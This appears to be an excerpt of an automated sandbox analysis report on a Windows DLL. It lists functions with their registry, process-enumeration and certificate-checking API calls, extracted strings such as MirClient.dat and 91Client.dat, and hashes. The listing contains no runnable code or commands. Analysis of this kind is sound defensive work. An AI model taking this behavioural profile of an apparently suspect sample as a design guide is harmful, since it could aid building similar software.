                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2353593579-0
                                                                                                                                      • Opcode ID: 249dde3f1720182bd2658c90376267f4551b0ca2612d8351ec373c3c28fb9e5b
                                                                                                                                      • Instruction ID: ea2e6466425d9bcd13495e19c1b073f5572f96fced77658cacb451580f89c7b1
                                                                                                                                      • Opcode Fuzzy Hash: 249dde3f1720182bd2658c90376267f4551b0ca2612d8351ec373c3c28fb9e5b
                                                                                                                                      • Instruction Fuzzy Hash: 4601E93644025ABBDF535F91DE04EDF3B2ABF593A8F208014FA1859224C73AC562DBA1
                                                                                                                                      Function 69E86986 Relevance: 6.0, APIs: 4, Instructions: 36registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 69E869A4
                                                                                                                                      • RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 69E869C0
                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 69E869CF
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 69E869D6
                                                                                                                                      • RegSetValueExA.ADVAPI32 ref: 69E86A17
                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 69E86A22
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 69E86A29
                                                                                                                                      • RegSetValueExA.ADVAPI32 ref: 69E86AB6
                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 69E86AC1
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 69E86AC8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Close$Value$CreateOpen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3298538213-0
                                                                                                                                      • Opcode ID: d42a9c6e296f2ab18f9809ddbe4e973adf8ad6150137b8ad28e31049852fa516
                                                                                                                                      • Instruction ID: 70709218b1f29e1c64db37b74bd9f0e9ff4edcf3adb8d3415323808f8b4d56f7
                                                                                                                                      • Opcode Fuzzy Hash: d42a9c6e296f2ab18f9809ddbe4e973adf8ad6150137b8ad28e31049852fa516
                                                                                                                                      • Instruction Fuzzy Hash: 9BF06D326143959BDB12CBA0D949ABBB3ACFB89610F54482EA589C2041EB35950CCB62
                                                                                                                                      Function 69E9AE10 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 275COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • GetXzsDlqTypeByOurType unknow type..., xrefs: 69E9B06C
                                                                                                                                      • C:\pl.txt, xrefs: 69E9B052
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: C:\pl.txt$GetXzsDlqTypeByOurType unknow type...
                                                                                                                                      • API String ID: 0-1978444376
                                                                                                                                      • Opcode ID: 7d44f6a05e528e62691eb558cfb28b4d2979f26dd3350af26df87d8a75c33cfb
                                                                                                                                      • Instruction ID: 4c98f6cf2a0008941f903d56fc5e1d0867e8a7572ee3059236edc862ef9c832e
                                                                                                                                      • Opcode Fuzzy Hash: 7d44f6a05e528e62691eb558cfb28b4d2979f26dd3350af26df87d8a75c33cfb
                                                                                                                                      • Instruction Fuzzy Hash: 0F51C793F5603056EB1411CDA9A12889311D78A7BBF790CBBF61ADBB80EA05CC9553C0
                                                                                                                                      Function 69E93AA0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 69E93AEC
                                                                                                                                        • Part of subcall function 69EBED6C: __FF_MSGBANNER.LIBCMT ref: 69EBED8F
                                                                                                                                        • Part of subcall function 69EBED6C: __NMSG_WRITE.LIBCMT ref: 69EBED96
                                                                                                                                        • Part of subcall function 69EBED6C: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,69EC8DFF,?,00000001,?,?,69EC7CE7,00000018,69EE8F08,0000000C,69EC7D78), ref: 69EBEDE3
                                                                                                                                      • _memset.LIBCMT ref: 69E93AFC
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap_malloc_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2365696598-3916222277
                                                                                                                                      • Opcode ID: 50ee5f179f0ee51403bd744e1e06a68adaa70f05f3d4c4d229b3c342abc6c1bb
                                                                                                                                      • Instruction ID: 2c73bb6d34c54df6d65088e6eecb18c2a8cb5c6873e6e4c6e8f2c2426c149330
                                                                                                                                      • Opcode Fuzzy Hash: 50ee5f179f0ee51403bd744e1e06a68adaa70f05f3d4c4d229b3c342abc6c1bb
                                                                                                                                      • Instruction Fuzzy Hash: 7B8155751183459FC301DF28C590A1BFBE5BF99708F209A4DF5AA97341D770E90ACBA2
                                                                                                                                      Function 69ECD1FA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __fileno__getbuf
                                                                                                                                      • String ID: hi
                                                                                                                                      • API String ID: 2304796792-3038002902
                                                                                                                                      • Opcode ID: f5da81572a3524a412fc63a1ae07f090f9344fe7a50fcc40b951551bb2613653
                                                                                                                                      • Instruction ID: c7d4157548726ac99db0fe8ec1c007420446daeb164072820b24938a937c79d2
                                                                                                                                      • Opcode Fuzzy Hash: f5da81572a3524a412fc63a1ae07f090f9344fe7a50fcc40b951551bb2613653
                                                                                                                                      • Instruction Fuzzy Hash: 5B31F572108A408AC729CA29C9417267BE1AF8237CB34A71EE5BB877E0D735E44BC651
                                                                                                                                      Function 69EC9C6E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __calloc_crt
                                                                                                                                      • String ID: `ki
                                                                                                                                      • API String ID: 3494438863-1926171119
                                                                                                                                      • Opcode ID: f1fbeca36f14a8f1f6755ef03e4ba6dba4217273c81aa909c4725b1a72ddbcce
                                                                                                                                      • Instruction ID: 225aaa4e69bcd43cf4ab982b486160bb30a1993c263a88454fcae5cc0c910d0d
                                                                                                                                      • Opcode Fuzzy Hash: f1fbeca36f14a8f1f6755ef03e4ba6dba4217273c81aa909c4725b1a72ddbcce
                                                                                                                                      • Instruction Fuzzy Hash: 7611E331708A158BF7158E2DBF41A613AE5BBC672CB34416FE575CB384E630C841428A
                                                                                                                                      Function 69EA08D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69EA08F6
                                                                                                                                        • Part of subcall function 69E9DA10: GetModuleHandleA.KERNEL32 ref: 69E9DACA
                                                                                                                                        • Part of subcall function 69E9DA10: GetProcAddress.KERNEL32(00000000), ref: 69E9DAD1
                                                                                                                                        • Part of subcall function 69EA3FB0: _memset.LIBCMT ref: 69EA3FD8
                                                                                                                                      • _memset.LIBCMT ref: 69EA093A
                                                                                                                                        • Part of subcall function 69EA44F0: CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 69EA4558
                                                                                                                                        • Part of subcall function 69EA44F0: CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 69EA457A
                                                                                                                                        • Part of subcall function 69EA44F0: LocalAlloc.KERNEL32(00000040,?), ref: 69EA458B
                                                                                                                                        • Part of subcall function 69EA44F0: CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 69EA45A5
                                                                                                                                        • Part of subcall function 69EA44F0: _printf.LIBCMT ref: 69EA45BC
                                                                                                                                        • Part of subcall function 69EA44F0: CertFindCertificateInStore.CRYPT32(?,00010001,00000000,000B0000,?,00000000), ref: 69EA45F6
                                                                                                                                      Strings
                                                                                                                                      • Shanghai Huizun Industries Co., Ltd., xrefs: 69EA0974
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Crypt_memset$Param$AddressAllocCertCertificateFindHandleLocalModuleObjectProcQueryStore_printf
                                                                                                                                      • String ID: Shanghai Huizun Industries Co., Ltd.
                                                                                                                                      • API String ID: 3606257896-2979844265
                                                                                                                                      • Opcode ID: 9fa0e1448807794013bc2e3d397f5c9ca7653e9ab8d73cb3b329cc216574e0bd
                                                                                                                                      • Instruction ID: 0c63f547cc4526c07e1fcf27c0de5b4ddde90d04cc105671b4ad9b1b49bd0d81
                                                                                                                                      • Opcode Fuzzy Hash: 9fa0e1448807794013bc2e3d397f5c9ca7653e9ab8d73cb3b329cc216574e0bd
                                                                                                                                      • Instruction Fuzzy Hash: 8611D6755083445BE725C724DD42BEF73D86FC930CF54882DA59C8B190FB75960886E3
                                                                                                                                      Function 69EA3E30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      • keyname is : %s, buffer is : %s, length is : %d, xrefs: 69EA3E75
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset_sprintf
                                                                                                                                      • String ID: keyname is : %s, buffer is : %s, length is : %d
                                                                                                                                      • API String ID: 1557529856-1723146052
                                                                                                                                      • Opcode ID: dd468c3562b02298b259ac1bbddd0e1c19050f13aefab67ea5d533f766de49c9
                                                                                                                                      • Instruction ID: 0c79f769732eef802653a65e17ed5076ab6e2a6f0db034c62f0ba027df8b969f
                                                                                                                                      • Opcode Fuzzy Hash: dd468c3562b02298b259ac1bbddd0e1c19050f13aefab67ea5d533f766de49c9
                                                                                                                                      • Instruction Fuzzy Hash: 0901D232504398ABD335DA289C45FEBB3DCEBC5308F10496DAD989B181DB706A08C3E6
                                                                                                                                      Function 69EA2970 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69EA2998
                                                                                                                                        • Part of subcall function 69E9DB40: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 69E9DB63
                                                                                                                                        • Part of subcall function 69E9DB40: _memset.LIBCMT ref: 69E9DB7A
                                                                                                                                        • Part of subcall function 69E9DB40: Process32First.KERNEL32 ref: 69E9DB90
                                                                                                                                        • Part of subcall function 69E9DB40: CloseHandle.KERNEL32(00000000), ref: 69E9DB9A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                      • String ID: 91Client.dat$MirClient.dat
                                                                                                                                      • API String ID: 113637525-146612288
                                                                                                                                      • Opcode ID: 8bc9f377779b88e8c1785a5ab60f628a6ec37290d70bc740f4186dc8061d01e1
                                                                                                                                      • Instruction ID: 225393a27959278b4bf54a318f2e6559be386909dbb1021f6c26da5b7f2b4d16
                                                                                                                                      • Opcode Fuzzy Hash: 8bc9f377779b88e8c1785a5ab60f628a6ec37290d70bc740f4186dc8061d01e1
                                                                                                                                      • Instruction Fuzzy Hash: F101F7BA9083145BD714D625AD42BEF76989F94709F10942DE948D7244F735E508C2E2
                                                                                                                                      Function 69E85A79 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      • file path: %s, md5 :%s, match val : %d, xrefs: 69E85AD8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
